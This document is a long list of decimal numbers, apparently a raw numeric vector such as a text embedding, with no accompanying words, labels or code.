-0.045450977981090546, 0.05291831120848656, -0.018964866176247597, 0.0035651791840791702, -0.020231885835528374, -0.021067580208182335, 0.014921184629201889, 0.027065707370638847, -0.01903226040303707, -0.0015879874117672443, -0.03927762433886528, 0.027564428746700287, 0.008680435828864574, -0.047418903559446335, 0.038657594472169876, 0.026540029793977737, -0.00985984317958355, 0.047445863485336304, -0.005940841976553202, -0.02729484997689724, -0.01237366534769535, 0.019840996712446213, 0.008383899927139282, -0.040760308504104614, 0.011362744495272636, 0.025569545105099678, 0.03046240098774433, -0.005290483124554157, 0.03455999866127968, -0.03938545659184456, -0.007083182223141193, -0.030004115775227547, 0.007912136614322662, 0.01675431989133358, 0.0009351013577543199, 0.02873709611594677, 0.018991824239492416, -0.005880186799913645, 0.02546171471476555, -0.02538084052503109, 0.013337409123778343, 0.01010920386761427, -0.026728734374046326, 0.0020521683618426323, 0.02889884263277054, 0.002544149523600936, -0.0039055224042385817, -0.007811044808477163, -0.02543475665152073, 0.014745958149433136, -0.032969482243061066, -0.007858220487833023, -0.01725304126739502, 0.01489422656595707, 0.0004890327109023929, 0.01341154333204031, -0.008801746182143688, 0.019867954775691032, 0.015568173490464687, -0.01819656603038311, -0.013795693404972553, 0.025043867528438568, 0.0008685491047799587, 0.026256971061229706, -0.039708953350782394, -0.01641734689474106, -0.030273694545030594, -0.03539569303393364, -0.023588141426444054, 0.005768985487520695, -0.013492417521774769, 0.026647860184311867, -0.01816960796713829, -0.026890480890870094, -0.0016789701767265797, -0.031945083290338516, -0.0034708266612142324, -0.003817909164354205, 0.0032315754797309637, -0.028251854702830315, -0.033023398369550705, 0.020811481401324272, -0.018075255677103996, -0.009994632564485073, 0.008458034135401249, -0.009900280274450779, -0.04957553371787071, -0.000033012867788784206, 0.01680823601782322, 0.014719000086188316, -0.012629765085875988, 0.004343587905168533, -0.041649919003248215, 0.004673821851611137, 0.03135200962424278, 0.06060130521655083, 0.04014027863740921, -0.03070502169430256, 0.005940841976553202, -0.024167736992239952, -0.02346683107316494, 0.02782052755355835, 0.0015694538597017527, -0.005566801410168409, 0.004623275715857744, 0.030246736481785774, -0.008983712643384933, -0.012548891827464104, 0.0025256159715354443, -0.035961806774139404, -0.00011836192425107583, -0.04208124428987503, -0.00046333851059898734, -0.010520311072468758, 0.022900715470314026, 0.01091794017702341, 0.016606051474809647, 0.010378782637417316, 0.005964430049061775, 0.017495661973953247, -0.004704149439930916, 0.030246736481785774, -0.026917438954114914, -0.05146258696913719, -0.022590700536966324, 0.002683993661776185, -0.016875630244612694, 0.007952573709189892, 0.05337659642100334, 0.016107331961393356, 0.006277815438807011, -0.010203556157648563, 0.02496299333870411, -0.025569545105099678, 0.033131230622529984, -0.01963881216943264, -0.04671800136566162, 0.020366676151752472, 0.002626708010211587, -0.02951887436211109, 0.026580465957522392, -0.008114321157336235, 0.008410857059061527, -0.04809284955263138, 0.002434633206576109, -0.027510512620210648, 0.03628529980778694, -0.006530545651912689, 0.009280248545110226, 0.006311513017863035, -0.009138720110058784, -0.024639498442411423, 0.004754695575684309, 0.03903500363230705, -0.0038718250580132008, 0.0012417471734806895, 0.03388604894280434, -0.006412604823708534, 0.01130208931863308, -0.024140778928995132, 0.01054053008556366, -0.0013975973706692457, -0.0167812779545784, 0.01583775319159031, -0.009165678173303604, 0.029464958235621452, -0.013175661675632, 0.015959063544869423, 0.010837065987288952, 0.005236567463725805, 0.014975100755691528, 0.02246939018368721, -0.014206800609827042, -0.003844866994768381, -0.04278215020895004, 0.010843805968761444, -0.025340404361486435, 0.03129809349775314, -0.003885303856804967, -0.007184274028986692, 0.01073597464710474, -0.019328797236084938, 0.004677191376686096, 0.0136204669252038, 0.012171480804681778, 0.014840311370790005, -0.005583649966865778, -0.02721397578716278, 0.01529859472066164, 0.02540779858827591, -0.0005989703349769115, -0.011814289726316929, -0.003073197789490223, -0.003020967124029994, 0.017765240743756294, -0.0013647425221279263, -0.003598876530304551, 0.04283606633543968, -0.02779357135295868, -0.03407475724816322, 0.010601185262203217, 0.015581652522087097, 0.019396191462874413, -0.018816597759723663, -0.023210732266306877, 0.01194233912974596, -0.001325148157775402, 0.007952573709189892, -0.0006276130443438888, -0.033966924995183945, -0.014665084891021252, -0.021229326725006104, 0.0006073946715332568, 0.02349378913640976, 0.027092665433883667, -0.017495661973953247, -0.009866583161056042, -0.019045740365982056, 0.021781964227557182, -0.028090106323361397, 0.016633009538054466, 0.012939780950546265, 0.0007430264377035201, -0.005455600097775459, 0.0026452415622770786, -0.015487300232052803, 0.013553072698414326, -0.004104336723685265, -0.009361122734844685, 0.0028726987075060606, -0.0273757241666317, 0.021701090037822723, 0.01769784651696682, -0.02307594195008278, -0.022725488990545273, -0.0042290170677006245, 0.028925800696015358, -0.0014270825777202845, -0.03423650190234184, 0.024895599111914635, 0.038657594472169876, 0.0200297012925148, 0.04717628285288811, 0.02108106017112732, 0.012171480804681778, -0.01858745515346527, 0.013910263776779175, 0.015972541645169258, -0.025650419294834137, 0.017953945323824883, 0.010985334403812885, -0.044507455080747604, 0.0060621523298323154, 0.010122682899236679, 0.009711574763059616, 0.012818470597267151, -0.017131730914115906, -0.008478252217173576, -0.008444555103778839, -0.011362744495272636, 0.005415163468569517, 0.05076168105006218, 0.012393883429467678, -0.01717216707766056, -0.02236155793070793, 0.0373905748128891, 0.030031073838472366, 0.004926552064716816, -0.03181029483675957, 0.011504273861646652, -0.003878564340993762, 0.010210295207798481, -0.019234444946050644, -0.000024233129806816578, -0.0306241475045681, -0.0022526674438267946, 0.02404642477631569, 0.016552135348320007, 0.023035505786538124, 0.032106831669807434, -0.05666545778512955, 0.009138720110058784, 0.010439437814056873, 0.010466395877301693, 0.005078190006315708, -0.016565615311264992, 0.038765426725149155, 0.029950201511383057, -0.0021212478168308735, 0.00814127828925848, -0.00985984317958355, -0.03550352156162262, -0.03057023137807846, -0.001042090356349945, 0.019544459879398346, -0.007750389631837606, -0.017994383350014687, -0.013694601133465767, 0.04677191376686096, 0.021242806687951088, -0.0028288920875638723, -0.009105022996664047, 0.000003544144647094072, 0.027577906847000122, -0.01485378947108984, -0.020771043375134468, 0.030219780281186104, 0.038792382925748825, -0.035907890647649765, 0.01717216707766056, 0.016134288161993027, 0.0058902958407998085, -0.0003104367933701724, 0.0029114505741745234, -0.0380106046795845, 0.00040436815470457077, -0.0008356941398233175, -0.03272686153650284, -0.023264646530151367, -0.028440559282898903, 0.035827018320560455, -0.027510512620210648, 0.026782650500535965, 0.022927673533558846, 0.02790140174329281, -0.017657408490777016, 0.019760122522711754, -0.030893726274371147, -0.007757128681987524, 0.006874258629977703, -0.0347217433154583, 0.007784086745232344, 0.006587830837816, 0.0015517628053203225, 0.0031490169931203127, 0.025596503168344498, -0.0066754440777003765, -0.006544024683535099, 0.022981589660048485, -0.0023689232766628265, -0.022738968953490257, 0.01680823601782322, -0.032133787870407104, 0.018991824239492416, 0.018129171803593636, -0.006661965046077967, -0.010574227198958397, -0.006372168194502592, -0.0002558892301749438, 0.004346957430243492, -0.01219169981777668, -0.020043181255459785, -0.012468017637729645, -0.04706845059990883, -0.00047049918794073164, -0.007204492576420307, -0.014004616998136044, -0.006412604823708534, 0.006483369041234255, 0.013640685006976128, 0.0034640871454030275, -0.030408484861254692, 0.0029485176783055067, 0.015716440975666046, -0.001490265130996704, -0.004539032466709614, 0.011450357735157013, -0.004121185280382633, 0.0034472383558750153, 0.002704211976379156, 0.017414787784218788, -0.002992324298247695, 0.04520835727453232, -0.027052229270339012, -0.016889110207557678, 0.00690795574337244, -0.0008066301816143095, 0.021768484264612198, -0.030327610671520233, 0.014206800609827042, -0.0011583463056012988, 0.014085490256547928, 0.006143026053905487, -0.021984148770570755, -0.0030091728549450636, -0.002010046737268567, 0.02052842266857624, -0.023183774203062057, -0.00841759704053402, -0.02401946857571602, -0.012326489202678204, 0.012211917899549007, 0.00019460216572042555, 0.01675431989133358, 0.015379467979073524, 0.0038718250580132008, 0.032942526042461395, -0.02391163632273674, 0.016188204288482666, 0.013121746480464935, 0.0012324803974479437, 0.02333204261958599, -0.026863522827625275, 0.004303150810301304, 0.03442520648241043, -0.02854839153587818, 0.028575349599123, 0.0315137580037117, 0.007703213021159172, 0.04790414497256279, -0.021566301584243774, 0.01299369614571333, -0.020353196188807487, 0.061625704169273376, -0.012380404397845268, -0.005408423952758312, -0.0009317315998487175, -0.018129171803593636, 0.005522994790226221, -0.006045303773134947, -0.006968610920011997, -0.00024283149105031043, 0.04971032217144966, -0.025663897395133972, -0.017010420560836792, -0.013148704543709755, 0.0037505144719034433, 0.002604804700240493, -0.0009418408153578639, -0.02257722057402134, -0.007298844866454601, -0.003251793794333935, -0.017873071134090424, -0.03922370821237564, -0.006968610920011997, -0.017347393557429314, -0.0344521664083004, 0.04022115096449852, -0.01533903181552887, 0.03439825028181076, -0.006169984117150307, -0.016188204288482666, 0.0004498595662880689, 0.015082932077348232, -0.00524330697953701, 0.000026260235244990326, -0.004774913657456636, -0.02186283841729164, 0.012063649483025074, -0.014665084891021252, -0.021903274580836296, -0.0054522305727005005, -0.01819656603038311, -0.06335101276636124, 0.0008870825986377895, -0.02110801637172699, 0.025663897395133972, 0.025070825591683388, 0.00925329141318798, 0.025609983131289482, -0.007898657582700253, -0.0018196566961705685, 0.008067144080996513, 0.010897721163928509, -0.009340903721749783, 0.029923243448138237, -0.013991137966513634, -0.004855787381529808, -0.014570732600986958, 0.052244365215301514, -0.0031422774773091078, -0.013155443593859673, -0.01847962476313114, -0.0009519500308670104, 0.0006326676812022924, -0.03369734436273575, -0.009671137668192387, 0.0014405614929273725, 0.002512137172743678, 0.020771043375134468, 0.020798001438379288, 0.01872224546968937, -0.031028514727950096, 0.020043181255459785, -0.01966577023267746, 0.0009393134969286621, -0.0009418408153578639, -0.005179281812161207, 0.002394196344539523, -0.0061194379813969135, 0.03164854645729065, -0.0005707488162443042, -0.0034573476295918226, -0.00595769053325057, 0.026971355080604553, 0.025758251547813416, -0.015581652522087097, -0.01219169981777668, 0.01733391359448433, -0.007251668721437454, -0.03197203949093819, 0.00345397787168622, 0.022765927016735077, 0.006052043288946152, -0.0003072776598855853, -0.04043681547045708, -0.015096411108970642, -0.007056224159896374, 0.02718701772391796, 0.023925114423036575, -0.022698532789945602, 0.0012602807255461812, -0.018183087930083275, 0.019180528819561005, 0.0029754755087196827, -0.03523394465446472, -0.0029266143683344126, -0.013067830353975296, -0.029168421402573586, 0.0051152571104466915, -0.01052705105394125, 0.006048673298209906, -0.03423650190234184, -0.016538657248020172, 0.04302477091550827, 0.04507356882095337, -0.013499156571924686, -0.026418719440698624, -0.006759687326848507, -0.008916317485272884, -0.00429304176941514, 0.007912136614322662, 0.02218633145093918, -0.00430652080103755, -0.0062272693030536175, -0.0060655223205685616, 0.043429140001535416, -0.002544149523600936, -0.004663712810724974, 0.005880186799913645, 0.032915566116571426, -0.024316003546118736, -0.01675431989133358, -0.01719912514090538, -0.020097097381949425, 0.01630951464176178, -0.029896285384893417, 0.004606427159160376, 0.001871887594461441, 0.018156129866838455, 0.014247237704694271, -0.005610608030110598, -0.029249295592308044, 0.014530295506119728, 0.009475693106651306, -0.03426346182823181, -0.03536873310804367, 0.01822352409362793, -0.004387394525110722, -0.012366925366222858, 0.001974664395675063, 0.008869141340255737, -0.0035853974986821413, 0.005715069826692343, 0.015109890140593052, -0.0013133540051057935, -0.024531668052077293, 0.009037627838551998, -0.03612355515360832, -0.03342776745557785, -0.03280773386359215, -0.001186989014968276, 0.0204745065420866, -0.012184959836304188, -0.008592823520302773, -0.013290232978761196, -0.013539593666791916, -0.016794756054878235, 0.007002308499068022, -0.0324033685028553, -0.017131730914115906, -0.017023898661136627, 0.006122807506471872, -0.00693491380661726, -0.010506832040846348, 0.02760486491024494, -0.02451818808913231, 0.001619999879039824, 0.0012417471734806895, -0.005590389482676983, 0.004269453696906567, 0.04218907654285431, -0.03536873310804367, -0.018654851242899895, 0.018007861450314522, 0.03763319551944733, -0.05262177437543869, 0.00764929736033082, -0.019625334069132805, -0.01617472618818283, -0.01149753388017416, 0.03695924952626228, 0.018924430012702942, 0.026081744581460953, -0.0028120435308665037, 0.02050146460533142, -0.020703649148344994, -0.007480810862034559, 0.005556692369282246, -0.004235756117850542, -0.024477751925587654, 0.011234695091843605, 0.05650370940566063, -0.016066893935203552, -0.009563306346535683, -0.0005012479959987104, 0.025313446298241615, 0.03695924952626228, -0.01636343076825142, -0.007891918532550335, -0.006857409607619047, -0.004579469095915556, 0.01174689456820488, -0.05068080872297287, -0.012582588940858841, -0.0015408111503347754, -0.01683519408106804, -0.00383812771178782, -0.016296036541461945, -0.010870764032006264, -0.012872385792434216, -0.009799188002943993, 0.03269990533590317, -0.008073884062469006, -0.0022947893012315035, 0.031001558527350426, -0.027281370013952255, 0.019382713362574577, -0.01639038883149624, -0.0013360996963456273, 0.0015365988947451115, 0.029491916298866272, 0.03342776745557785, -0.03070502169430256, 0.030246736481785774, -0.0055600618943572044, -0.0004186895093880594, 0.0020336348097771406, 0.014530295506119728, 0.036878373473882675, -0.02663438208401203, 0.006746208760887384, -0.013991137966513634, -0.026674818247556686, -0.0028187830466777086, 0.007588642183691263, -0.005678002722561359, -0.02304898388683796, 0.017131730914115906, 0.0009190951241180301, -0.010830326937139034, 0.012501714751124382, 0.007285366300493479, 0.005310701671987772, -0.0009687987039797008, -0.028467517346143723, 0.03221466392278671, -0.01388330664485693, -0.022563742473721504, 0.01780567690730095, 0.03660879656672478, -0.013728298246860504, -0.026620902121067047, -0.01919400878250599, -0.012333228252828121, 0.023655535653233528, 0.013445240445435047, -0.021876316517591476, 0.014665084891021252, -0.005731918383389711, 0.023709451779723167, 0.00008924530993681401, 0.04027506709098816, -0.022038063034415245, -0.021323680877685547, -0.006254227366298437, -0.001700031105428934, -0.004252605140209198, -0.009280248545110226, -0.01922096498310566, -0.006850670091807842, -0.010102463886141777, 0.0019982524681836367, -0.035773102194070816, -0.03286164999008179, -0.017293477430939674, 0.006213790271431208, 0.013768735341727734, 0.004094227682799101, -0.01093141920864582, 0.02532692439854145, 0.017576536163687706, -0.03550352156162262, -0.017994383350014687, 0.021795442327857018, -0.04321347549557686, 0.019840996712446213, 0.0011019031517207623, -0.031109388917684555, -0.004539032466709614, -0.014435943216085434, -0.020339718088507652, -0.006122807506471872, 0.0034506081137806177, -0.045936219394207, 0.014260716736316681, 0.016875630244612694, -0.0062272693030536175, 0.00618009315803647, -0.018021339550614357, -0.019544459879398346, -0.006260966882109642, -0.006587830837816, -0.01908617652952671, 0.009704835712909698, -0.012245615012943745, 0.018493102863430977, 0.08723568916320801, -0.024531668052077293, 0.00004030518539366312, -0.01955793984234333, -0.0024750700686126947, -0.009536348283290863, -0.0019359125290066004, 0.012346707284450531, -0.024181215092539787, 0.009489172138273716, 0.009064585901796818, 0.0005185179179534316, 0.0029552571941167116, 0.009826146066188812, 0.00835020188242197, -0.0003795163647737354, -0.0037572539877146482, -0.005000686272978783, 0.030219780281186104, -0.018762681633234024, -0.005405054427683353, 0.006887737195938826, 0.019328797236084938, -0.021310200914740562, 0.03280773386359215, -0.0051051476038992405, -0.01213778369128704, -0.009098283015191555, -0.025138219818472862, -0.01830439828336239, -0.010843805968761444, -0.007089921273291111, -0.006274445913732052, -0.006004867143929005, -0.005816161632537842, -0.008437815122306347, 0.005074820015579462, -0.005758876446634531, -0.05081559717655182, -0.0032231512013822794, -0.011214477010071278, -0.006752947811037302, -0.00574876694008708, -0.0016823399346321821, 0.007015787530690432, -0.009644180536270142, 0.009880061261355877, -0.006577721796929836, -0.007501028943806887, 0.0011229640804231167, 0.002043744083493948, -0.00515906373038888, 0.007204492576420307, 0.024733850732445717, 0.01578383706510067, 0.029033632948994637, 0.009933977387845516, -0.01031812746077776, -0.01363394595682621, -0.020892353728413582, -0.011699718423187733, 0.007824523374438286, -0.021431511268019676, 0.020798001438379288, 0.005415163468569517, 0.002987269777804613, -0.011430139653384686, 0.011976036243140697, -0.015581652522087097, 0.0324033685028553, -0.003101840615272522, 0.015554694458842278, 0.017482182011008263, -0.007864960469305515, 0.013236316852271557, 0.009003930725157261, 0.009529609233140945, 0.03450608253479004, -0.013505895622074604, 0.003962807822972536, 0.026135660707950592, 0.02876405417919159, -0.011457097716629505, 0.028359685093164444, -0.014530295506119728, 0.024208173155784607, -0.008727612905204296, -0.01052705105394125, -0.012077128514647484, 0.0016107331030070782, -0.0019140092190355062, 0.010008111596107483, 0.01026421133428812, 0.001490265130996704, 0.021687611937522888, 0.026149140670895576, 0.009475693106651306, -0.006035194732248783, -0.005988018121570349, -0.017455225810408592, -0.003501154249534011, -0.0046030571684241295, 0.03172941878437996, 0.006031824741512537, -0.013047612272202969, 0.005870077759027481, -0.029276253655552864, 0.015015536919236183, -0.009098283015191555, -0.020487986505031586, -0.05267569050192833, 0.00027084239991381764, 0.01343850139528513, -0.011504273861646652, -0.011369484476745129, 0.012488236650824547, 0.024585582315921783, 0.0013647425221279263, -0.009516130201518536, -0.03154071420431137, -0.0007055381429381669, -0.018600935116410255, 0.049144208431243896, -0.023601621389389038, 0.01900530233979225, -0.0038414974696934223, 0.000803260481916368, -0.00690795574337244, 0.02687700279057026, 0.007804305292665958, 0.0272409338504076, -0.016579093411564827, -0.00836368091404438, -0.01529859472066164, 0.01736087165772915, -0.021229326725006104, 0.026944397017359734, -0.014476379379630089, -0.015042494982481003, 0.0006878470885567367, -0.008397378027439117, 0.008505210280418396, 0.04113771766424179, 0.0057892040349543095, 0.0015568173257634044, -0.008815225213766098, -0.015109890140593052, 0.0005004055565223098, 0.00983288511633873, 0.01341154333204031, -0.01148405484855175, -0.022779405117034912, 0.020757565274834633, 0.02734876610338688, -0.0037842118181288242, 0.003334352280944586, 0.0014506707666441798, -0.0054421210661530495, -0.00429304176941514, -0.00606889184564352, 0.00714383739978075, -0.0021060840226709843, 0.020798001438379288, 0.019962307065725327, -0.010830326937139034, 0.022294163703918457, 0.011194257996976376, -0.010203556157648563, -0.02110801637172699, -0.011686239391565323, 0.015029015950858593, -0.017657408490777016, -0.02710614539682865, 0.014961621724069118, 0.012292791157960892, 0.0057757250033319, -0.004741216544061899, 0.03129809349775314, 0.019261403009295464, -0.038900215178728104, 0.0018937907880172133, 0.03248424082994461, 0.023062463849782944, 0.017374351620674133, 0.0102372532710433, -0.04876679927110672, -0.020865395665168762, 0.022482868283987045, -0.03286164999008179, 0.016457783058285713, 0.007271887268871069, 0.05135475471615791, -0.017913509160280228, -0.01711825095117092, -0.004175100941210985, -0.0362313874065876, -0.01008224580436945, -0.019369233399629593, -0.001365584903396666, -0.0025525738019496202, 0.013357628136873245, -0.028413601219654083, -0.004623275715857744, -0.0007472386350855231, -0.02188979648053646, -0.02488211914896965, 0.006645116489380598, 0.002560998313128948, 0.009657659567892551, 0.008222152478992939, -0.015177284367382526, 0.009098283015191555, -0.006105958949774504, -0.00985984317958355, 0.0036292041186243296, 0.026256971061229706, -0.0010370358359068632, -0.009226333349943161, 0.0047311075031757355, -0.002594695659354329, -0.006618158426135778, -0.007325802929699421, 0.01620168425142765, 0.020366676151752472, -0.0032787516247481108, 0.009812667034566402, 0.028197938576340675, -0.024814724922180176, -0.007608860731124878, 0.010574227198958397, -0.026809608563780785, -0.0226580947637558, -0.020043181255459785, 0.008983712643384933, 0.0020740716718137264, -0.024235131219029427, 0.006331731099635363, 0.023898158222436905, 0.006079000886529684, -0.012002994306385517, 0.015123368240892887, -0.0004317472339607775, -0.01659257337450981, -0.014799874275922775, -0.000863494467921555, -0.00014742588973604143, 0.0067933849059045315, -0.014840311370790005, -0.000110464112367481, 0.03129809349775314, -0.012636504136025906, 0.007116879336535931, -0.007069703191518784, -0.009401559829711914, -0.011120123788714409, 0.022038063034415245, 0.016565615311264992, 0.015460342168807983, 0.012265834026038647, 0.00880848616361618, 0.007298844866454601, -0.009199375286698341, -0.010520311072468758, 0.013586769811809063, -0.011113384738564491, 0.034883491694927216, 0.00745385279878974, -0.009367861784994602, 0.015500779263675213, -0.0012080498272553086, 0.01872224546968937, -0.011322308331727982, 0.014341589994728565, -0.015662526711821556, -0.007905397564172745, -0.007689733989536762, -0.001932542771100998, -0.013337409123778343, 0.006988829467445612, -0.0047243679873645306, -0.009172417223453522, 0.056881118565797806, 0.030974600464105606, -0.01578383706510067, -0.00011056941730203107, -0.030111948028206825, -0.01196929719299078, -0.01850658282637596, -0.01914009265601635, -0.02210545912384987, -0.0002624180633574724, 0.008080623112618923, 0.011558189056813717, -0.01488074753433466, 0.025946956127882004, 0.01694302447140217, -0.017684366554021835, 0.01914009265601635, -0.006702402140945196, 0.008673696778714657, 0.0019527612021192908, 0.03245728462934494, 0.008896099403500557, 0.0059442115016281605, -0.020339718088507652, 0.016296036541461945, 0.0010117627680301666, 0.010203556157648563, 0.005920623429119587, -0.014462900348007679, -0.0017244616756215692, -0.00022661464754492044, 0.01969272829592228, -0.01761697232723236, 0.014408985152840614, -0.021350638940930367, 0.0018415598897263408, -0.010190077126026154, -0.010850545018911362, 0.01639038883149624, 0.011935600079596043, -0.008929796516895294, -0.023251168429851532, -0.020043181255459785, -0.006004867143929005, -0.012899343855679035, 0.01567600481212139, -0.005031013861298561, -0.005078190006315708, -0.03259207308292389, 0.022644616663455963, 0.012663462199270725, 0.04035593941807747, 0.022213289514183998, -0.0020976597443223, -0.015986019745469093, 0.011807549744844437, 0.00240599038079381, 0.0007948361453600228, -0.0023554444778710604, -0.025704335421323776, 0.015770357102155685, -0.006075631361454725, 0.03261902928352356, 0.010378782637417316, 0.016929546371102333, 0.0035685489419847727, 0.010958376340568066, 0.006668704561889172, -0.028036192059516907, -0.006820342503488064, 0.01529859472066164, -0.0021987517829984426, 0.014530295506119728, -0.023682493716478348, -0.014934663660824299, -0.0020942899864166975, 0.011416660621762276, 0.02968062274158001, -0.023871200159192085, -0.006254227366298437, -0.007184274028986692, -0.007379718590527773, -0.00002015259269683156, 0.008343462832272053, -0.017913509160280228, -0.012029952369630337, 0.004973728209733963, 0.004323369357734919, 0.001169297844171524, -0.00018396644736640155, 0.03275382146239281, 0.024558626115322113, 0.009994632564485073, 0.0028912322595715523, -0.006287924479693174, 0.01947706565260887, -0.013950700871646404, 0.0008571762009523809, 0.028413601219654083, 0.005745397415012121, -0.014314631931483746, 0.0012914508115500212, -0.008774789050221443, -0.01564904674887657, 0.004508704878389835, -0.006025085225701332, -0.013910263776779175, -0.00690795574337244, -0.006877628155052662, -0.011989515274763107, 0.006604679860174656, 0.023534225299954414, 0.015743399038910866, 0.027173539623618126, 0.021148454397916794, 0.018681807443499565, -0.014759437181055546, -0.026917438954114914, -0.004815350752323866, 0.015554694458842278, -0.011726676486432552, -0.013236316852271557, 0.008383899927139282, 0.011072947643697262, 0.008316504769027233, 0.004572729580104351, -0.009327425621449947, 0.016349952667951584, -0.010580966249108315, -0.003878564340993762, 0.003090046579018235, 0.003362995106726885, -0.024032946676015854, -0.02441035769879818, 0.0017573165241628885, -0.0065575032494962215, -0.016269078478217125, -0.020380154252052307, 0.0028036192525178194, 0.020865395665168762, -0.007474071346223354, -0.034047797322273254, -0.024127298966050148, 0.0038212789222598076, -0.0031405924819409847, 0.015177284367382526, -0.009381340816617012, -0.012097346596419811, -0.03226857632398605, -0.009441995993256569, -0.0012358501553535461, -0.0020268952939659357, -0.005923993419855833, 0.010567487217485905, -0.003831388195976615, -0.04035593941807747, -0.01922096498310566, -0.009260030463337898, -0.004552511498332024, 0.02110801637172699, -0.03051631525158882, -0.007939094677567482, -0.0067933849059045315, -0.009327425621449947, -0.0025289857294410467, -0.03221466392278671, -0.007217971608042717, -0.00858608353883028, 0.015851231291890144, 0.007824523374438286, 0.011389702558517456, 0.014004616998136044, 0.01861441321671009, 0.0050040557980537415, -0.013162183575332165, -0.009900280274450779, -0.011659281328320503, -0.006250857375562191, -0.008491731248795986, 0.011005553416907787, -0.009502651169896126, 0.025502150878310204, 0.024733850732445717, 0.008741091005504131, 0.0011280186008661985, -0.009098283015191555, 0.008552386425435543, -0.0003125428920611739, -0.015824273228645325, 0.02663438208401203, 0.013559811748564243, 0.0038010606076568365, -0.0018331356113776565, -0.005546582862734795, -0.018183087930083275, -0.020878875628113747, -0.021593259647488594, -0.02343987300992012, -0.0013285177992656827, 0.017185647040605545, 0.002537410007789731, -0.005371356848627329, 0.007015787530690432, 0.009165678173303604, 0.013735038228332996, -0.014368548057973385, 0.006995568983256817, 0.002311637857928872, 0.02330508455634117, 0.014193321578204632, 0.0010580966481938958, 0.00923981238156557, 0.005337659735232592, 0.0315137580037117, 0.02485516108572483, 0.01736087165772915, 0.01109316572546959, 0.0019780341535806656, -0.016066893935203552, 0.02069016918540001, -0.009367861784994602, 0.005260155536234379, 0.0002443057601340115, 0.0065743522718548775, -0.007838002406060696, -0.004636754747480154, -0.004579469095915556, 0.006264336407184601, -0.010008111596107483, 0.006988829467445612, -0.012676941230893135, -0.0003555069852154702, -0.0028373165987432003, 0.00837715994566679, 0.003969547338783741, 0.006860779598355293, -0.009664398618042469, -0.02055538073182106, -0.0042290170677006245, 0.009772229939699173, 0.00371344736777246, 0.0012619656044989824, -0.037821900099515915, 0.006695662625133991, 0.01761697232723236, 0.0028929170221090317, -0.00857260450720787, -0.012070389464497566, -0.005853228736668825, 0.020366676151752472, 0.0027614973951131105, -0.011807549744844437, 0.00029485177947208285, -0.006301403511315584, -0.0011524491710588336, 0.02449123002588749, -0.008700654841959476, 0.004003244452178478, -0.02488211914896965, 0.01069553755223751, -0.024369919672608376, 0.004859157372266054, 0.020649733021855354, 0.011382963508367538, -0.004505334887653589, -0.006887737195938826, 0.012663462199270725, -0.004053790587931871, -0.004188579972833395, -0.013788953423500061, 0.007912136614322662, -0.0065642427653074265, -0.0018954756669700146, 0.008707393892109394, 0.015932105481624603, 0.019045740365982056, -0.002495288383215666, -0.000653728493489325, 0.01969272829592228, -0.007447113282978535, -0.00859956257045269, 0.031918127089738846, 0.01190190203487873, 0.01924792304635048, 0.028063150122761726, -0.010762931779026985, 0.007002308499068022, -0.0060014971531927586, -0.011241434141993523, 0.003234945237636566, 0.012468017637729645, 0.0000743974233046174, 0.003327612765133381, -0.00005112519284011796, 0.002832261845469475, 0.014462900348007679, -0.015163805335760117, -0.011113384738564491, -0.013546332716941833, 0.013101527467370033, 0.007191013544797897, -0.029896285384893417, -0.015177284367382526, -0.015554694458842278, -0.01719912514090538, 0.016579093411564827, -0.015622089616954327, -0.028009233996272087, -0.0004578626831062138, 0.0033697346225380898, 0.0052163489162921906, -0.021701090037822723, 0.004444679711014032, -0.008060405030846596, -0.018924430012702942, -0.005135475657880306, -0.006638376973569393, -0.002956941956654191, 0.00857260450720787, -0.010190077126026154, 0.008828704245388508, -0.00011804601672338322, -0.008929796516895294, -0.011457097716629505, -0.0026452415622770786, 0.03757927939295769, -0.00383812771178782, -0.007298844866454601, -0.01930183917284012, 0.0013807486975565553, 0.006928174290806055, -0.0038145394064486027, 0.003233260242268443, 0.010890982113778591, -0.017010420560836792, 0.006635007448494434, 0.003117004409432411, -0.02790140174329281, -0.04475007578730583, 0.018547018989920616, 0.01296673808246851, 0.0011431823950260878, 0.0022189700976014137, -0.013472198508679867, 0.00797279179096222, 0.027928359806537628, -0.031109388917684555, 0.010864024050533772, -0.02005665935575962, 0.0010092355078086257, 0.018978344276547432, 0.007137097883969545, 0.02962670661509037, -0.01583775319159031, 0.0547514483332634, -0.0026317627634853125, -0.018398750573396683, 0.013991137966513634, 0.0016772854141891003, -0.0007455537561327219, -0.006914695259183645, -0.01806177757680416, 0.00879500713199377, 0.0067933849059045315, 0.013344149105250835, 0.03642009198665619, -0.0014557252870872617, -0.009152199141681194, 0.006473260000348091, 0.0013664274010807276, 0.009778969921171665, -0.008963493630290031, 0.01738782972097397, -0.004346957430243492, -0.017455225810408592, 0.003191138617694378, 0.003571918699890375, 0.005405054427683353, -0.0016949764685705304, 0.027497034519910812, 0.015082932077348232, -0.006941653322428465, 0.005138845182955265, 0.002860904671251774, 0.020824959501624107, -0.0209193117916584, 0.004822090268135071, 0.020541902631521225, 0.009752011857926846, -0.017104772850871086, 0.014355069026350975, -0.013519374653697014, 0.015972541645169258, -0.025138219818472862, -0.010601185262203217, -0.000508829893078655, -0.0049400306306779385, -0.005937472451478243, -0.018412228673696518, 0.016242120414972305, 0.012939780950546265, 0.005064710974693298, 0.0009030888322740793, -0.0029940090607851744, -0.03159463033080101, -0.007864960469305515, 0.010756192728877068, -0.0004498595662880689, -0.0010808423394337296, 0.012313010171055794, -0.0015795630170032382, 0.0026738843880593777, 0.02116193249821663, -0.0009485802729614079, -0.028251854702830315, -0.010466395877301693, 0.0012223712401464581, 0.0028305770829319954, 0.021121496334671974, 0.03245728462934494, -0.013964179903268814, -0.004525553435087204, 0.012393883429467678, 0.0055533223785459995, 0.003300654934719205, 0.003646052675321698, -0.007730171084403992, 0.019989265128970146, 0.010574227198958397, 0.020892353728413582, -0.0060082366690039635, -0.011133602820336819, -0.003747144713997841, 0.012097346596419811, 0.02404642477631569, 0.003398377215489745, -0.01342502236366272, 0.019261403009295464, 0.003309079213067889, -0.011376223526895046, 0.015150326304137707, 0.017455225810408592, -0.0011819343781098723, 0.011686239391565323, 0.004609796684235334, -0.03135200962424278, -0.03175637871026993, -0.020258843898773193, -0.007420155685395002, -0.004326739348471165, 0.02327812649309635, 0.014597689732909203, -0.002805304015055299, -0.000018730985175352544, -0.022334599867463112, -0.0022594069596379995, -0.013256535865366459, -0.008451294153928757, -0.010965116322040558, 0.03749840706586838, -0.023264646530151367, -0.006742838770151138, 0.0018247112166136503, 0.0025289857294410467, 0.010405740700662136, -0.012663462199270725, 0.012656723149120808, -0.01853354088962078, 0.014112448319792747, -0.008673696778714657, 